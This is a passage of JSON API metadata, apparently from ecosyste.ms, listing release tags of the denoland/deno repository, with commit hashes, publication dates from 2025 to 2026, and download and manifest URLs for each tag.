.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/Git